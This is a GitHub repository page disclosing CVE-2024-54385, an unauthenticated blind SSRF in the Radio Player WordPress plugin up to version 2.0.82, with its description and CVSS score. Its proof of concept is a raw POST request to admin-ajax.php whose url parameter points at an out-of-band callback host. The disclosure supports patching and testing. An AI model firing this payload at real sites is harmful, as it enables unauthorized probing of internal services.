Skip to content
/ CVE-2024-54385 Public

Radio Player <= 2.0.82 - Blind Unauthenticated Server-Side Request Forgery

0 stars 0 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

RandomRobbieBF/CVE-2024-54385

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

2 Commits
README.md
README.md
 
 

Repository files navigation

CVE-2024-54385

Radio Player <= 2.0.82 - Unauthenticated Server-Side Request Forgery

Description

The Radio Player – Live Shoutcast, Icecast and Any Audio Stream Player for WordPress plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 2.0.82. This makes it possible for unauthenticated attackers to make web requests to arbitrary locations originating from the web application which can be used to query and modify information from internal services.

Details

  • Type: plugin
  • Slug: radio-player
  • Affected Version: 2.0.82
  • CVSS Score: 7.2
  • CVSS Rating: High
  • CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
  • CVE: CVE-2024-54385
  • Status: Active

POC

POST /wp-admin/admin-ajax.php HTTP/2
Host: wp-dev.ddev.site
Content-Type: application/x-www-form-urlencoded
Content-Length: 127

action=radio_player_get_stream_data&nonce=feb9ecfbfa&utm_source=&url=http://918sodewycbbjnbts7cxy5bqyh48s0gp.bc.oast.site/live.m3u8

About

Radio Player <= 2.0.82 - Blind Unauthenticated Server-Side Request Forgery

Resources

Readme
Activity

Stars

0 stars

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published